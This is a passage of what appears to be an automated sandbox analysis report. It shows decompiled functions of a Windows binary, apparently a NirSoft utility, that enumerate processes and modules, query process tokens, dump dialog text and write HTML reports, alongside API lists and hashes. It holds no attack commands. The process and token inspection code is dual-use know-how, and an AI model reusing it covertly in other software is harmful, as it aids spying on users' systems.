				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                                                    0x00409ab0
                                                                                                                    0x00409ab7
                                                                                                                    0x00409ac8
                                                                                                                    0x00409acf
                                                                                                                    0x00409ad4
                                                                                                                    0x00409ae0
                                                                                                                    0x00409ae6
                                                                                                                    0x00409ae8
                                                                                                                    0x00409af0
                                                                                                                    0x00409c3a
                                                                                                                    0x00409c41
                                                                                                                    0x00409c67
                                                                                                                    0x00000000
                                                                                                                    0x00409c67
                                                                                                                    0x00409c49
                                                                                                                    0x00409c50
                                                                                                                    0x00409c51
                                                                                                                    0x00409c56
                                                                                                                    0x00409c57
                                                                                                                    0x00409c5a
                                                                                                                    0x00000000
                                                                                                                    0x00409c64
                                                                                                                    0x00409b00
                                                                                                                    0x00409b03
                                                                                                                    0x00409b06
                                                                                                                    0x00409b0b
                                                                                                                    0x00409b10
                                                                                                                    0x00409ba9
                                                                                                                    0x00409bac
                                                                                                                    0x00409bc1
                                                                                                                    0x00409bc7
                                                                                                                    0x00409bcc
                                                                                                                    0x00409bd8
                                                                                                                    0x00409bf0
                                                                                                                    0x00409bf2
                                                                                                                    0x00409c23
                                                                                                                    0x00409c26
                                                                                                                    0x00409c2f
                                                                                                                    0x00409c34
                                                                                                                    0x00409c34
                                                                                                                    0x00000000
                                                                                                                    0x00409c2f
                                                                                                                    0x00409bf7
                                                                                                                    0x00409bfb
                                                                                                                    0x00409c02
                                                                                                                    0x00409c06
                                                                                                                    0x00409c0d
                                                                                                                    0x00409c14
                                                                                                                    0x00409c17
                                                                                                                    0x00409c18
                                                                                                                    0x00409c1b
                                                                                                                    0x00409c1e
                                                                                                                    0x00000000
                                                                                                                    0x00409c1e
                                                                                                                    0x00409b1f
                                                                                                                    0x00409b25
                                                                                                                    0x00409b2a
                                                                                                                    0x00409b2d
                                                                                                                    0x00409b33
                                                                                                                    0x00409b3d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00409b4b
                                                                                                                    0x00409b53
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00409b6a
                                                                                                                    0x00409b6c
                                                                                                                    0x00409b6e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00409b77
                                                                                                                    0x00409b7b
                                                                                                                    0x00409b82
                                                                                                                    0x00409b86
                                                                                                                    0x00409b8d
                                                                                                                    0x00409b8e
                                                                                                                    0x00409b94
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00409AB7
                                                                                                                    • memset.MSVCRT ref: 00409ACF
                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                    • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                      • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                    • memset.MSVCRT ref: 00409B25
                                                                                                                    • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                    • memset.MSVCRT ref: 00409BC7
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                    • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                    • API String ID: 3504373036-27875219
                                                                                                                    • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                    • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                    • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                    • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                                                    0x00409179
                                                                                                                    0x00409209
                                                                                                                    0x00409209
                                                                                                                    0x00409185
                                                                                                                    0x0040918a
                                                                                                                    0x0040918f
                                                                                                                    0x00409208
                                                                                                                    0x00000000
                                                                                                                    0x00409191
                                                                                                                    0x0040919e
                                                                                                                    0x004091a2
                                                                                                                    0x004091a7
                                                                                                                    0x004091af
                                                                                                                    0x004091b3
                                                                                                                    0x004091b8
                                                                                                                    0x004091c0
                                                                                                                    0x004091c4
                                                                                                                    0x004091c9
                                                                                                                    0x004091d1
                                                                                                                    0x004091d5
                                                                                                                    0x004091da
                                                                                                                    0x004091e2
                                                                                                                    0x004091e6
                                                                                                                    0x004091eb
                                                                                                                    0x004091ed
                                                                                                                    0x004091ed
                                                                                                                    0x004091eb
                                                                                                                    0x004091da
                                                                                                                    0x004091c9
                                                                                                                    0x004091b8
                                                                                                                    0x004091ff
                                                                                                                    0x00409202
                                                                                                                    0x00409202
                                                                                                                    0x00000000
                                                                                                                    0x004091ff

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                      • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                    • API String ID: 1182944575-70141382
                                                                                                                    • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                    • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                    • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                    • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                    0x004090f5
                                                                                                                    0x00409171
                                                                                                                    0x00409171
                                                                                                                    0x004090fd
                                                                                                                    0x00409103
                                                                                                                    0x00409107
                                                                                                                    0x00409170
                                                                                                                    0x00000000
                                                                                                                    0x00409170
                                                                                                                    0x00409116
                                                                                                                    0x0040911a
                                                                                                                    0x0040911f
                                                                                                                    0x00409127
                                                                                                                    0x0040912b
                                                                                                                    0x00409130
                                                                                                                    0x00409138
                                                                                                                    0x0040913c
                                                                                                                    0x00409141
                                                                                                                    0x00409149
                                                                                                                    0x0040914d
                                                                                                                    0x00409152
                                                                                                                    0x0040915a
                                                                                                                    0x0040915e
                                                                                                                    0x00409163
                                                                                                                    0x00409165
                                                                                                                    0x00409165
                                                                                                                    0x00409163
                                                                                                                    0x00409152
                                                                                                                    0x00409141
                                                                                                                    0x00409130
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                    • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                    • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                    • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                    • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 56%
                                                                                                                    			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                                    0x00409faf
                                                                                                                    0x00409fb4
                                                                                                                    0x00409fb5
                                                                                                                    0x00409fb6
                                                                                                                    0x0040a043
                                                                                                                    0x0040a04a
                                                                                                                    0x0040a058
                                                                                                                    0x0040a05f
                                                                                                                    0x0040a06d
                                                                                                                    0x0040a074
                                                                                                                    0x0040a08e
                                                                                                                    0x0040a099
                                                                                                                    0x0040a0ab
                                                                                                                    0x0040a0c9
                                                                                                                    0x0040a0ce
                                                                                                                    0x00000000
                                                                                                                    0x0040a0ce
                                                                                                                    0x00409fc3
                                                                                                                    0x00409fca
                                                                                                                    0x00409fd8
                                                                                                                    0x00409fdf
                                                                                                                    0x00409ff9
                                                                                                                    0x0040a006
                                                                                                                    0x0040a018
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                    • String ID: %%0.%df
                                                                                                                    • API String ID: 3473751417-763548558
                                                                                                                    • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                    • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                    • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                    • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 51%
                                                                                                                    			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                                    0x00406216
                                                                                                                    0x0040621b
                                                                                                                    0x00406222
                                                                                                                    0x0040625f
                                                                                                                    0x00406263
                                                                                                                    0x00406269
                                                                                                                    0x00406271
                                                                                                                    0x00406273
                                                                                                                    0x00406289
                                                                                                                    0x00406289
                                                                                                                    0x0040628e
                                                                                                                    0x0040628f
                                                                                                                    0x004062a9
                                                                                                                    0x004062ab
                                                                                                                    0x004062ad
                                                                                                                    0x004062b0
                                                                                                                    0x004062c3
                                                                                                                    0x004062c3
                                                                                                                    0x004062d3
                                                                                                                    0x004062da
                                                                                                                    0x004062f1
                                                                                                                    0x004062f7
                                                                                                                    0x004062fe
                                                                                                                    0x0040630d
                                                                                                                    0x00406312
                                                                                                                    0x0040631e
                                                                                                                    0x00406327
                                                                                                                    0x00406275
                                                                                                                    0x00406283
                                                                                                                    0x00406283
                                                                                                                    0x00406285
                                                                                                                    0x00406287
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406277
                                                                                                                    0x0040627a
                                                                                                                    0x00406280
                                                                                                                    0x00406280
                                                                                                                    0x00000000
                                                                                                                    0x00406280
                                                                                                                    0x00000000
                                                                                                                    0x0040627a
                                                                                                                    0x00000000
                                                                                                                    0x00406283
                                                                                                                    0x00406273
                                                                                                                    0x00406224
                                                                                                                    0x00406224
                                                                                                                    0x00406229
                                                                                                                    0x0040622a
                                                                                                                    0x0040622f
                                                                                                                    0x00406236
                                                                                                                    0x0040623c
                                                                                                                    0x00406243
                                                                                                                    0x00406245
                                                                                                                    0x00406247
                                                                                                                    0x00406248
                                                                                                                    0x0040624b
                                                                                                                    0x00406254
                                                                                                                    0x00406254
                                                                                                                    0x0040632d
                                                                                                                    0x00406334

                                                                                                                    APIs
                                                                                                                    • LoadMenuW.USER32 ref: 00406236
                                                                                                                      • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                      • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                      • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                      • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                    • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                    • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                    • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                    • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                    • memset.MSVCRT ref: 004062DA
                                                                                                                    • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                    • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                    • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                      • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                    • String ID: caption
                                                                                                                    • API String ID: 973020956-4135340389
                                                                                                                    • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                    • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                    • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                    • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 65%
                                                                                                                    			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                                    0x004081e4
                                                                                                                    0x004081ec
                                                                                                                    0x004081fc
                                                                                                                    0x00408200
                                                                                                                    0x00408215
                                                                                                                    0x0040821c
                                                                                                                    0x0040822a
                                                                                                                    0x00408231
                                                                                                                    0x0040823f
                                                                                                                    0x00408246
                                                                                                                    0x0040824b
                                                                                                                    0x0040824e
                                                                                                                    0x0040825a
                                                                                                                    0x0040825c
                                                                                                                    0x00408261
                                                                                                                    0x0040826c
                                                                                                                    0x0040826d
                                                                                                                    0x0040826e
                                                                                                                    0x00408273
                                                                                                                    0x00408273
                                                                                                                    0x00408276
                                                                                                                    0x0040827c
                                                                                                                    0x0040828a
                                                                                                                    0x00408290
                                                                                                                    0x004082ab
                                                                                                                    0x004082c5
                                                                                                                    0x004082c6
                                                                                                                    0x004082d1
                                                                                                                    0x004082d2
                                                                                                                    0x004082d3
                                                                                                                    0x004082e7
                                                                                                                    0x004082ec
                                                                                                                    0x004082f0
                                                                                                                    0x00000000
                                                                                                                    0x004082f5
                                                                                                                    0x004082fe

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                                    • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                    • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                    • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                    • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 85%
                                                                                                                    			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                    0x0040920a
                                                                                                                    0x00409218
                                                                                                                    0x00409223
                                                                                                                    0x0040922c
                                                                                                                    0x0040924b
                                                                                                                    0x00409253
                                                                                                                    0x0040929b
                                                                                                                    0x004092e4
                                                                                                                    0x0040929d
                                                                                                                    0x004092a3
                                                                                                                    0x004092b1
